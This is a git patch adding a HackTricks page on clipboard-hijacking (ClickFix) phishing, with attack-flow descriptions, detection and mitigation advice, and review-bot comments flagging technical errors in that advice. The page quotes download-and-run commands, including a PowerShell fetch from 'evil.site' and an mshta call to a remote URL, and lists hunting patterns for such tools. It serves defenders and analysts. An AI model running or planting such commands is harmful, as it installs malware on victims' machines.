From 2c5590c44851c9e10c8d058d4e99c1ad99ba8b2d Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Mon, 14 Jul 2025 12:51:11 +0000 Subject: [PATCH] Add content from: Fix the Click: Preventing the ClickFix Attack Vector --- src/SUMMARY.md | 1 + ...nexmon-monitor-and-injection-on-android.md | 4 +- .../phishing-methodology/README.md | 8 ++ .../clipboard-hijacking.md | 96 +++++++++++++++++++ .../ios-pentesting-without-jailbreak.md | 2 +- .../pentesting-telnet.md | 2 +- 6 files changed, 109 insertions(+), 4 deletions(-) create mode 100644 src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 93b6e3273..f741a1440 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -28,6 +28,7 @@ - [Enable Nexmon Monitor And Injection On Android](generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md) - [Evil Twin EAP-TLS](generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md) - [Phishing Methodology](generic-methodologies-and-resources/phishing-methodology/README.md) + - [Clipboard Hijacking](generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md) - [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md) - [Detecting Phishing](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md) - [Discord Invite Hijacking](generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md) diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md b/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md index 2ee072b12..9c74b3b41 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md 
+++ b/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md @@ -22,7 +22,7 @@ The same technique applies to any handset that has a publicly available NexMon p * NexMon Magisk ZIP or self-compiled patch providing: * `/system/lib*/libnexmon.so` * `/system/xbin/nexutil` -* Hijacker ≥ 1.7 (arm/arm64) – https://github.com/chrisk44/Hijacker +* Hijacker ≥ 1.7 (arm/arm64) – [https://github.com/chrisk44/Hijacker](https://github.com/chrisk44/Hijacker) * (Optional) Kali NetHunter or any Linux chroot where you intend to run wireless tools --- @@ -130,4 +130,4 @@ Performance on the Galaxy S10 is comparable to external USB NICs (~20 dBm TX, 2- * [NexMon – firmware patching framework](https://github.com/seemoo-lab/nexmon) * [Hijacker (aircrack-ng GUI for Android)](https://github.com/chrisk44/Hijacker) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/phishing-methodology/README.md b/src/generic-methodologies-and-resources/phishing-methodology/README.md index 22d7af72f..ab2c5dadf 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/README.md 
@@ -458,6 +458,14 @@ You can **buy a domain with a very similar name** to the victims domain **and/or Use [**Phishious** ](https://github.com/Rices/Phishious)to evaluate if your email is going to end in the spam folder or if it's going to be blocked or successful. +## Clipboard Hijacking / Pastejacking + +Attackers can silently copy malicious commands into the victim’s clipboard from a compromised or typosquatted web page and then trick the user to paste them inside **Win + R**, **Win + X** or a terminal window, executing arbitrary code without any download or attachment. + +{{#ref}} +clipboard-hijacking.md +{{#endref}} + ## References - [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md new file mode 100644 index 000000000..195dd87af --- /dev/null +++ b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md 
@@ -0,0 +1,96 @@ +# Clipboard Hijacking (Pastejacking) Attacks + +{{#include ../../banners/hacktricks-training.md}} + +> "Never paste anything you did not copy yourself." – old but still valid advice + +## Overview + +Clipboard hijacking – also known as *pastejacking* – abuses the fact that users routinely copy-and-paste commands without inspecting them. A malicious web page (or any JavaScript-capable context such as an Electron or Desktop application) programmatically places attacker-controlled text into the system clipboard. Victims are encouraged, normally by carefully crafted social-engineering instructions, to press **Win + R** (Run dialog), **Win + X** (Quick Access / PowerShell), or open a terminal and *paste* the clipboard content, immediately executing arbitrary commands. + +Because **no file is downloaded and no attachment is opened**, the technique bypasses most e-mail and web-content security controls that monitor attachments, macros or direct command execution. The attack is therefore popular in phishing campaigns delivering commodity malware families such as NetSupport RAT, Latrodectus loader or Lumma Stealer. + +## JavaScript Proof-of-Concept + +```html + + + +``` + +Older campaigns used `document.execCommand('copy')`, newer ones rely on the asynchronous **Clipboard API** (`navigator.clipboard.writeText`). + +## The ClickFix / ClearFake Flow + +1. User visits a typosquatted or compromised site (e.g. `docusign.sa[.]com`) +2. Injected **ClearFake** JavaScript calls an `unsecuredCopyToClipboard()` helper that silently stores a Base64-encoded PowerShell one-liner in the clipboard. +3. HTML instructions tell the victim to: *“Press **Win + R**, paste the command and press Enter to resolve the issue.”* +4. `powershell.exe` executes, downloading an archive that contains a legitimate executable plus a malicious DLL (classic DLL sideloading). +5. The loader decrypts additional stages, injects shellcode and installs persistence (e.g. 
scheduled task) – ultimately running NetSupport RAT / Latrodectus / Lumma Stealer. + +### Example NetSupport RAT Chain + +```powershell +powershell -nop -w hidden -enc +# ↓ Decodes to: +Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ; +Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ; +%TEMP%\f\jp2launcher.exe # Sideloads msvcp140.dll +``` + +* `jp2launcher.exe` (legitimate Java WebStart) searches its directory for `msvcp140.dll`. +* The malicious DLL dynamically resolves APIs with **GetProcAddress**, downloads two binaries (`data_3.bin`, `data_4.bin`) via **curl.exe**, decrypts them using a rolling XOR key `"https://google.com/"`, injects the final shellcode and unzips **client32.exe** (NetSupport RAT) to `C:\ProgramData\SecurityCheck_v1\`. + +### Latrodectus Loader + +``` +powershell -nop -enc # Cloud Identificator: 2031 +``` + +1. Downloads `la.txt` with **curl.exe** +2. Executes the JScript downloader inside **cscript.exe** +3. Fetches an MSI payload → drops `libcef.dll` besides a signed application → DLL sideloading → shellcode → Latrodectus. + +### Lumma Stealer via MSHTA + +``` +mshta https://iplogger.co/xxxx =+\\xxx +``` + +The **mshta** call launches a hidden PowerShell script that retrieves `PartyContinued.exe`, extracts `Boat.pst` (CAB), reconstructs `AutoIt3.exe` through `extrac32` & file concatenation and finally runs an `.a3x` script which exfiltrates browser credentials to `sumeriavgv.digital`. + +## Detection & Hunting + +Blue-teams can combine clipboard, process-creation and registry telemetry to pinpoint pastejacking abuse: + +* Windows Registry: `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` keeps a history of **Win + R** commands – look for unusual Base64 / obfuscated entries. +* Security Event ID **4688** (Process Creation) where `ParentImage` == `explorer.exe` and `NewProcessName` in { `powershell.exe`, `wscript.exe`, `mshta.exe`, `curl.exe`, `cmd.exe` }. 
+* Event ID **4663** for file creations under `%LocalAppData%\Microsoft\Windows\WinX\` or temporary folders right before the suspicious 4688 event. +* EDR clipboard sensors (if present) – correlate `Clipboard Write` followed immediately by a new PowerShell process. + +## Mitigations + +1. Browser hardening – disable clipboard write-access (`dom.events.asyncClipboard.clipboardItem` etc.) or require user gesture. +2. Security awareness – teach users to *type* sensitive commands or paste them into a text editor first. +3. PowerShell Constrained Language Mode / Execution Policy + Application Control to block arbitrary one-liners. +4. Network controls – block outbound requests to known pastejacking and malware C2 domains. + +## Related Tricks + +* **Discord Invite Hijacking** often abuses the same ClickFix approach after luring users into a malicious server: + {{#ref}} + discord-invite-hijacking.md + {{#endref}} + +## References + +- [Fix the Click: Preventing the ClickFix Attack Vector](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/) +- [Pastejacking PoC – GitHub](https://github.com/dxa4481/Pastejacking) + +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md index 791da2761..1f226fae0 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md +++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md 
@@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth ### Automated dynamic analysis with MobSF (no jailbreak) -[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB: +[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB: ```bash docker pull opensecurity/mobile-security-framework-mobsf:latest diff --git a/src/network-services-pentesting/pentesting-telnet.md b/src/network-services-pentesting/pentesting-telnet.md index 31ca7a6ae..5eb9580d6 100644 --- a/src/network-services-pentesting/pentesting-telnet.md +++ b/src/network-services-pentesting/pentesting-telnet.md @@ -139,4 +139,4 @@ After a shell is obtained remember that **TTYs are usually dumb**; upgrade with -{{#include /banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}}
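Review bot: in the new `## Clipboard Hijacking / Pastejacking` paragraph of the README.md hunk, "trick the user to paste them" should read "trick the user into pasting them"; the placement after the Phishious paragraph and before `## References`, and the column-0 `{{#ref}}` block, match the rest of the file.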
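Review bot: the `## Detection & Hunting` bullets in the new clipboard-hijacking.md mix Sysmon and Security-log field names: Security Event ID 4688 has no `ParentImage` field (its parent field is `ParentProcessName`, rendered as `Creator Process Name`, and `ProcessCommandLine` is only populated when command-line auditing is enabled, which is what makes the `-enc` blob visible at all), while `ParentImage` belongs to Sysmon Event ID 1; pick one source per bullet and consider adding PowerShell Script Block Logging (Event ID 4104), which records the decoded script rather than the Base64. Event ID 4663 only fires for objects that carry a SACL, so that bullet should say object-access auditing must be configured (Sysmon Event ID 11 is the usual FileCreate source) and should explain why writes under `%LocalAppData%\Microsoft\Windows\WinX\` are expected, since the text elsewhere only says Win + X opens a menu. In `## Mitigations`, `dom.events.asyncClipboard.clipboardItem` is the Firefox pref for `ClipboardItem` support, not a switch that disables clipboard writes, so item 1 needs a control that actually restricts writes or should drop the pref name; item 3 should not present Execution Policy as a blocker, since Microsoft documents it as not a security boundary, which leaves Constrained Language Mode plus application control as the real controls. Smaller points: the `html` fence under `## JavaScript Proof-of-Concept` is empty, so either restore the snippet or drop the fence (the sentence after it already names both APIs); `powershell -nop -w hidden -enc` and `powershell -nop -enc` have nothing after `-enc`, and the decoded block uses cmd-style `%TEMP%` inside PowerShell cmdlets, so analysts should not expect it to match telemetry literally (write `$env:TEMP` or mark the block as a paraphrase); the `# Cloud Identificator: 2031` comment is unexplained; "besides a signed application" should be "beside"; the two untagged fences should get a language tag like the others; the `{{#ref}}` indented inside the `## Related Tricks` bullet differs from the column-0 form used in the README.md hunk, so check the preprocessor handles it; and the file ends with `\ No newline at end of file`, the very thing the nexmon hunk fixes elsewhere in this patch.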
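Review bot: the MobSF hunk in ios-pentesting-without-jailbreak.md replaces the `【†L2-L3】` citation marker with an empty `【】`, which leaves a stray bracket pair in the rendered sentence; remove the marker entirely (or replace it with a real link) rather than emptying it.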